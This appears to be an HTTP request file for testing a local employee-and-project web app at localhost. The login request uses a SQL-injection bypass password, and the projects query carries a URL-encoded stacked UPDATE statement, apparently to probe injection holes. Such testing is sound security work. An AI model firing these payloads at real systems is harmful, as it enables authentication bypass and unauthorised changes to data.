# DO LOGIN #
PUT http://localhost:8080/login  HTTP/1.1
content-type: application/json

{
    "username": "mattia",
    "password": "' OR '1'='1"
}

### 

# GET EMPLOYEES DATA #
GET http://localhost:8080/profiles/mattia/employees?query=El  HTTP/1.1
content-type: application/json
Session: 1
Token: T-AhUUgfnhSNfuAY3FcdfRsNE_sBGWTir0wb8gWFQHg

###

# GET PROJECT #
GET http://localhost:8080/profiles/mattia/projects?name=%25%27%20%3B%20UPDATE%20project%20SET%20end_date%20%3D%20%272025-12-31%27%20WHERE%20name%20%3D%20%27test%27%20%3B%20--  HTTP/1.1
content-type: application/json
Session: 1
Token: T-AhUUgfnhSNfuAY3FcdfRsNE_sBGWTir0wb8gWFQHg

###

# GET DEPARTMENT #
GET http://localhost:8080/profiles/mattia/departments  HTTP/1.1
content-type: application/json
Session: 1
Token: T-AhUUgfnhSNfuAY3FcdfRsNE_sBGWTir0wb8gWFQHg

###

# MODIFY MANAGER #
PUT http://localhost:8080/profiles/mattia/departments/scienza  HTTP/1.1
content-type: application/json
Session: 1
Token: T-AhUUgfnhSNfuAY3FcdfRsNE_sBGWTir0wb8gWFQHg

{
    "manager": 1
}